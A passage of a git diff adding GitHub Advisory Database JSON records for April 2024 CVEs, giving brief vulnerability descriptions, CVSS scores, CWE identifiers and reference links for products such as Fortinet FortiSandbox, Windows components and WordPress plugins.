"database_specific": { + "cwe_ids": [ + "CWE-120" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-10T00:15:12Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-39m6-4cjh-f5fx/GHSA-39m6-4cjh-f5fx.json b/advisories/unreviewed/2024/04/GHSA-39m6-4cjh-f5fx/GHSA-39m6-4cjh-f5fx.json new file mode 100644 index 00000000000..c1d33549704 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-39m6-4cjh-f5fx/GHSA-39m6-4cjh-f5fx.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-39m6-4cjh-f5fx", + "modified": "2024-04-09T15:30:38Z", + "published": "2024-04-09T15:30:38Z", + "aliases": [ + "CVE-2024-31487" + ], + "details": "A improper limitation of a pathname to a restricted directory ('path traversal') in Fortinet FortiSandbox version 4.4.0 through 4.4.4 and 4.2.0 through 4.2.6 and 4.0.0 through 4.0.5 and 3.2.0 through 3.2.4 and 3.1.0 through 3.1.5 and 3.0.0 through 3.0.7 and 2.5.0 through 2.5.2 and 2.4.0 through 2.4.1 may allows attacker to information disclosure via crafted http requests.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-31487" + }, + { + "type": "WEB", + "url": "https://fortiguard.com/psirt/FG-IR-24-060" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-22" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T15:15:31Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-3g3p-3q57-722m/GHSA-3g3p-3q57-722m.json b/advisories/unreviewed/2024/04/GHSA-3g3p-3q57-722m/GHSA-3g3p-3q57-722m.json new file mode 100644 index 00000000000..166e11102cb --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-3g3p-3q57-722m/GHSA-3g3p-3q57-722m.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-3g3p-3q57-722m", + "modified": "2024-04-09T18:30:27Z", + "published": "2024-04-09T18:30:27Z", + "aliases": [ + "CVE-2024-28917" + ], + "details": "Azure Arc-enabled Kubernetes Extension Cluster-Scope Elevation of Privilege Vulnerability", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:A/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-28917" + }, + { + "type": "WEB", + "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-28917" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-284" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T17:15:51Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-3gj4-2qc3-888r/GHSA-3gj4-2qc3-888r.json b/advisories/unreviewed/2024/04/GHSA-3gj4-2qc3-888r/GHSA-3gj4-2qc3-888r.json new file mode 100644 index 00000000000..7484b84cb76 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-3gj4-2qc3-888r/GHSA-3gj4-2qc3-888r.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-3gj4-2qc3-888r", + "modified": "2024-04-09T18:30:26Z", + "published": "2024-04-09T18:30:26Z", + "aliases": [ + "CVE-2024-26239" + ], + "details": "Windows Telephony Server Elevation of Privilege Vulnerability", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-26239" + }, + { + "type": "WEB", + "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-26239" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-122" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T17:15:44Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-3gqg-23cf-wq46/GHSA-3gqg-23cf-wq46.json b/advisories/unreviewed/2024/04/GHSA-3gqg-23cf-wq46/GHSA-3gqg-23cf-wq46.json new file mode 100644 index 00000000000..4236a2f8e1e --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-3gqg-23cf-wq46/GHSA-3gqg-23cf-wq46.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-3gqg-23cf-wq46", + "modified": "2024-04-09T18:30:28Z", + "published": "2024-04-09T18:30:28Z", + "aliases": [ + "CVE-2024-29064" + ], + "details": "Windows Hyper-V Denial of Service Vulnerability", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-29064" + }, + { + "type": "WEB", + "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-29064" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-130" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T17:16:00Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-3gw6-fj56-vc35/GHSA-3gw6-fj56-vc35.json b/advisories/unreviewed/2024/04/GHSA-3gw6-fj56-vc35/GHSA-3gw6-fj56-vc35.json new file mode 100644 index 00000000000..fa0376b2388 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-3gw6-fj56-vc35/GHSA-3gw6-fj56-vc35.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-3gw6-fj56-vc35", + "modified": "2024-04-09T09:31:11Z", + "published": "2024-04-09T09:31:11Z", + "aliases": [ + "CVE-2023-1082" + ], + "details": "An remote attacker with low privileges can perform a command injection which can lead to root access.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-1082" + }, + { + "type": "WEB", + "url": "https://cert.vde.com/en/advisories/VDE-2024-009" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-78" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T09:15:19Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-3j63-c5m3-j7wp/GHSA-3j63-c5m3-j7wp.json b/advisories/unreviewed/2024/04/GHSA-3j63-c5m3-j7wp/GHSA-3j63-c5m3-j7wp.json new file mode 100644 index 00000000000..0a62183286f --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-3j63-c5m3-j7wp/GHSA-3j63-c5m3-j7wp.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-3j63-c5m3-j7wp", + "modified": "2024-04-10T15:30:40Z", + "published": "2024-04-10T15:30:40Z", + "aliases": [ + "CVE-2024-26046" + ], + "details": "Adobe Experience Manager versions 6.5.19 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by an attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-26046" + }, + { + "type": "WEB", + "url": "https://helpx.adobe.com/security/products/experience-manager/apsb24-21.html" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-10T09:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-3j6m-r2w5-2j6r/GHSA-3j6m-r2w5-2j6r.json b/advisories/unreviewed/2024/04/GHSA-3j6m-r2w5-2j6r/GHSA-3j6m-r2w5-2j6r.json new file mode 100644 index 00000000000..81b4976b4e7 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-3j6m-r2w5-2j6r/GHSA-3j6m-r2w5-2j6r.json @@ -0,0 +1,46 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-3j6m-r2w5-2j6r", + "modified": "2024-04-09T21:31:56Z", + "published": "2024-04-09T21:31:56Z", + "aliases": [ + "CVE-2024-0626" + ], + "details": "The WooCommerce Clover Payment Gateway plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the callback_handler function in all versions up to, and including, 1.3.1. This makes it possible for unauthenticated attackers to mark orders as paid.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0626" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/woo-clover-gateway-by-zaytech/trunk/zaytech-woo-commerce-clover-integration.php?rev=2998654#L218" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3055678%40woo-clover-gateway-by-zaytech%2Ftrunk&old=2998658%40woo-clover-gateway-by-zaytech%2Ftrunk&sfp_email=&sfph_mail=#file3" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/57aacffa-0f49-4a33-ae40-d1c151363284?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T19:15:14Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-3jgm-wf2v-2mpq/GHSA-3jgm-wf2v-2mpq.json b/advisories/unreviewed/2024/04/GHSA-3jgm-wf2v-2mpq/GHSA-3jgm-wf2v-2mpq.json new file mode 100644 index 00000000000..94f4326895a --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-3jgm-wf2v-2mpq/GHSA-3jgm-wf2v-2mpq.json @@ -0,0 +1,46 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-3jgm-wf2v-2mpq", + "modified": "2024-04-09T21:32:00Z", + "published": "2024-04-09T21:32:00Z", + "aliases": [ + "CVE-2024-3136" + ], + "details": "The MasterStudy LMS plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 3.3.3 via the 'template' parameter. This makes it possible for unauthenticated attackers to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other “safe” file types can be uploaded and included.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-3136" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3064337/masterstudy-lms-learning-management-system/trunk/_core/lms/classes/helpers.php" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3064337/masterstudy-lms-learning-management-system/trunk/_core/lms/classes/templates.php" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/9a573740-cdfe-4b58-b33b-5e50bcbc4779?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T19:15:39Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-3mg8-g497-8859/GHSA-3mg8-g497-8859.json b/advisories/unreviewed/2024/04/GHSA-3mg8-g497-8859/GHSA-3mg8-g497-8859.json new file mode 100644 index 00000000000..6c6a99a2e34 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-3mg8-g497-8859/GHSA-3mg8-g497-8859.json @@ -0,0 +1,50 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-3mg8-g497-8859", + "modified": "2024-04-06T15:30:27Z", + "published": "2024-04-06T15:30:27Z", + "aliases": [ + "CVE-2024-3378" + ], + "details": "A vulnerability has been found in iboss Secure Web Gateway up to 10.1 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file /login of the component Login Portal. The manipulation of the argument redirectUrl leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 10.2.0.160 is able to address this issue. It is recommended to upgrade the affected component. The identifier VDB-259501 was assigned to this vulnerability.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-3378" + }, + { + "type": "WEB", + "url": "https://github.com/modrnProph3t/PoC/blob/main/iboss-stored-XSS.md" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.259501" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.259501" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.310642" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-06T13:15:12Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-3p58-r886-3jr6/GHSA-3p58-r886-3jr6.json b/advisories/unreviewed/2024/04/GHSA-3p58-r886-3jr6/GHSA-3p58-r886-3jr6.json new file mode 100644 index 00000000000..7912073dcfe --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-3p58-r886-3jr6/GHSA-3p58-r886-3jr6.json @@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-3p58-r886-3jr6", + "modified": "2024-04-05T21:32:44Z", + "published": "2024-04-05T21:32:44Z", + "aliases": [ + "CVE-2024-29755" + ], + "details": "In tmu_get_pi of tmu.c, there is a possible out of bounds read due to improper input validation. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-29755" + }, + { + "type": "WEB", + "url": "https://source.android.com/security/bulletin/pixel/2024-04-01" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-05T20:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-3pfm-489g-56g9/GHSA-3pfm-489g-56g9.json b/advisories/unreviewed/2024/04/GHSA-3pfm-489g-56g9/GHSA-3pfm-489g-56g9.json new file mode 100644 index 00000000000..6efbd9df0cc --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-3pfm-489g-56g9/GHSA-3pfm-489g-56g9.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-3pfm-489g-56g9", + "modified": "2024-04-09T21:32:00Z", + "published": "2024-04-09T21:32:00Z", + "aliases": [ + "CVE-2024-2804" + ], + "details": "The Network Summary plugin for WordPress is vulnerable to SQL Injection via the 'category' parameter in all versions up to, and including, 2.0.11 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-2804" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/network-summary/trunk/includes/class-network-summary.php#L225" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/3320c182-b1f9-4e06-92ea-0fa670557dd0?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T19:15:37Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-3pjh-4p3m-3gfm/GHSA-3pjh-4p3m-3gfm.json b/advisories/unreviewed/2024/04/GHSA-3pjh-4p3m-3gfm/GHSA-3pjh-4p3m-3gfm.json new file mode 100644 index 00000000000..b50e866bc7d --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-3pjh-4p3m-3gfm/GHSA-3pjh-4p3m-3gfm.json @@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-3pjh-4p3m-3gfm", + "modified": "2024-04-08T03:30:52Z", + "published": "2024-04-08T03:30:52Z", + "aliases": [ + "CVE-2023-52344" + ], + "details": "In modem-ps-nas-ngmm, there is a possible undefined behavior due to incorrect error handling. This could lead to remote information disclosure no additional execution privileges needed", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-52344" + }, + { + "type": "WEB", + "url": "https://www.unisoc.com/en_us/secy/announcementDetail/1777143682512781313" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-08T03:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-3q37-hvwq-f7ph/GHSA-3q37-hvwq-f7ph.json b/advisories/unreviewed/2024/04/GHSA-3q37-hvwq-f7ph/GHSA-3q37-hvwq-f7ph.json new file mode 100644 index 00000000000..5d58c4138b6 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-3q37-hvwq-f7ph/GHSA-3q37-hvwq-f7ph.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-3q37-hvwq-f7ph", + "modified": "2024-04-09T15:30:37Z", + "published": "2024-04-09T15:30:37Z", + "aliases": [ + "CVE-2023-49906" + ], + "details": "A stack-based buffer overflow vulnerability exists in the web interface Radio Scheduling functionality of Tp-Link AC1350 Wireless MU-MIMO Gigabit Access Point (EAP225 V3) v5.1.0 Build 20220926. A specially crafted series of HTTP requests can lead to remote code execution. An attacker can make an authenticated HTTP request to trigger this vulnerability.This vulnerability refers specifically to the overflow that occurs via the `ssid` parameter at offset `0x0045ab7c` of the `httpd_portal` binary shipped with v5.1.0 Build 20220926 of the EAP225.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-49906" + }, + { + "type": "WEB", + "url": "https://talosintelligence.com/vulnerability_reports/TALOS-2023-1888" + }, + { + "type": "WEB", + "url": "https://www.talosintelligence.com/vulnerability_reports/TALOS-2023-1888" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-121" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T15:15:29Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-3q7m-cr8v-q45g/GHSA-3q7m-cr8v-q45g.json b/advisories/unreviewed/2024/04/GHSA-3q7m-cr8v-q45g/GHSA-3q7m-cr8v-q45g.json new file mode 100644 index 00000000000..e75e7231736 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-3q7m-cr8v-q45g/GHSA-3q7m-cr8v-q45g.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-3q7m-cr8v-q45g", + "modified": "2024-04-09T09:31:11Z", + "published": "2024-04-09T09:31:11Z", + "aliases": [ + "CVE-2024-31365" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Themify Post Type Builder (PTB) allows Reflected XSS.This issue affects Post Type Builder (PTB): from n/a through 2.0.8.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-31365" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/vulnerability/themify-ptb/wordpress-post-type-builder-ptb-plugin-2-0-8-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T08:15:07Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-3q9p-q428-g22j/GHSA-3q9p-q428-g22j.json b/advisories/unreviewed/2024/04/GHSA-3q9p-q428-g22j/GHSA-3q9p-q428-g22j.json new file mode 100644 index 00000000000..9f8f9f11b6e --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-3q9p-q428-g22j/GHSA-3q9p-q428-g22j.json @@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-3q9p-q428-g22j", + "modified": "2024-04-08T06:31:29Z", + "published": "2024-04-08T06:31:29Z", + "aliases": [ + "CVE-2024-1292" + ], + "details": "The wpb-show-core WordPress plugin before 2.6 does not sanitise and escape some parameters before outputting them back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1292" + }, + { + "type": "WEB", + "url": "https://wpscan.com/vulnerability/56d4fc48-d0dc-4ac6-93cd-f64d4c3c5c07" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-08T05:15:07Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-3qr9-mgq6-hx96/GHSA-3qr9-mgq6-hx96.json b/advisories/unreviewed/2024/04/GHSA-3qr9-mgq6-hx96/GHSA-3qr9-mgq6-hx96.json new file mode 100644 index 00000000000..edd2658824c --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-3qr9-mgq6-hx96/GHSA-3qr9-mgq6-hx96.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-3qr9-mgq6-hx96", + "modified": "2024-04-09T21:31:58Z", + "published": "2024-04-09T21:31:58Z", + "aliases": [ + "CVE-2024-1571" + ], + "details": "The WP Recipe Maker plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Video Embed parameter in all versions up to, and including, 9.2.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with access to the recipe dashboard (which is administrator-only by default but can be assigned to arbitrary capabilities), to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1571" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3046892/wp-recipe-maker/trunk/includes/public/class-wprm-recipe-sanitizer.php" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/6c098b35-606e-4dde-8683-4c90f518ddb5?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T19:15:18Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-3qrx-86c2-gf3c/GHSA-3qrx-86c2-gf3c.json b/advisories/unreviewed/2024/04/GHSA-3qrx-86c2-gf3c/GHSA-3qrx-86c2-gf3c.json new file mode 100644 index 00000000000..65061274ce5 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-3qrx-86c2-gf3c/GHSA-3qrx-86c2-gf3c.json @@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-3qrx-86c2-gf3c", + "modified": "2024-04-09T18:30:28Z", + "published": "2024-04-09T18:30:28Z", + "aliases": [ + "CVE-2024-31507" + ], + "details": "Sourcecodester Online Graduate Tracer System v1.0 is vulnerable to SQL Injection via the \"request\" parameter in admin/fetch_gendercs.php.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-31507" + }, + { + "type": "WEB", + "url": "https://github.com/CveSecLook/cve/issues/6" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T18:15:10Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-3vqr-5r5v-rhm8/GHSA-3vqr-5r5v-rhm8.json b/advisories/unreviewed/2024/04/GHSA-3vqr-5r5v-rhm8/GHSA-3vqr-5r5v-rhm8.json new file mode 100644 index 00000000000..0ffe7f1c3e7 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-3vqr-5r5v-rhm8/GHSA-3vqr-5r5v-rhm8.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-3vqr-5r5v-rhm8", + "modified": "2024-04-09T18:30:28Z", + "published": "2024-04-09T18:30:28Z", + "aliases": [ + "CVE-2024-29061" + ], + "details": "Secure Boot Security Feature Bypass Vulnerability", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-29061" + }, + { + "type": "WEB", + "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-29061" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-121" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T17:15:59Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-3vvw-rvgw-fjmh/GHSA-3vvw-rvgw-fjmh.json b/advisories/unreviewed/2024/04/GHSA-3vvw-rvgw-fjmh/GHSA-3vvw-rvgw-fjmh.json new file mode 100644 index 00000000000..d2a3dc15c8c --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-3vvw-rvgw-fjmh/GHSA-3vvw-rvgw-fjmh.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-3vvw-rvgw-fjmh", + "modified": "2024-04-09T18:30:27Z", + "published": "2024-04-09T18:30:27Z", + "aliases": [ + "CVE-2024-28920" + ], + "details": "Secure Boot Security Feature Bypass Vulnerability", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-28920" + }, + { + "type": "WEB", + "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-28920" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-693" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T17:15:51Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-3w26-vfvh-2v33/GHSA-3w26-vfvh-2v33.json b/advisories/unreviewed/2024/04/GHSA-3w26-vfvh-2v33/GHSA-3w26-vfvh-2v33.json new file mode 100644 index 00000000000..ac4e8dc9748 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-3w26-vfvh-2v33/GHSA-3w26-vfvh-2v33.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-3w26-vfvh-2v33", + "modified": "2024-04-05T21:32:45Z", + "published": "2024-04-05T21:32:45Z", + "aliases": [ + "CVE-2023-5912" + ], + "details": "\nA potential memory leakage vulnerability was reported in some Lenovo Notebook products that may allow a local attacker with elevated privileges to write to NVRAM variables. \n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-5912" + }, + { + "type": "WEB", + "url": "https://support.lenovo.com/us/en/product_security/LEN-155477" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-787" + ], + 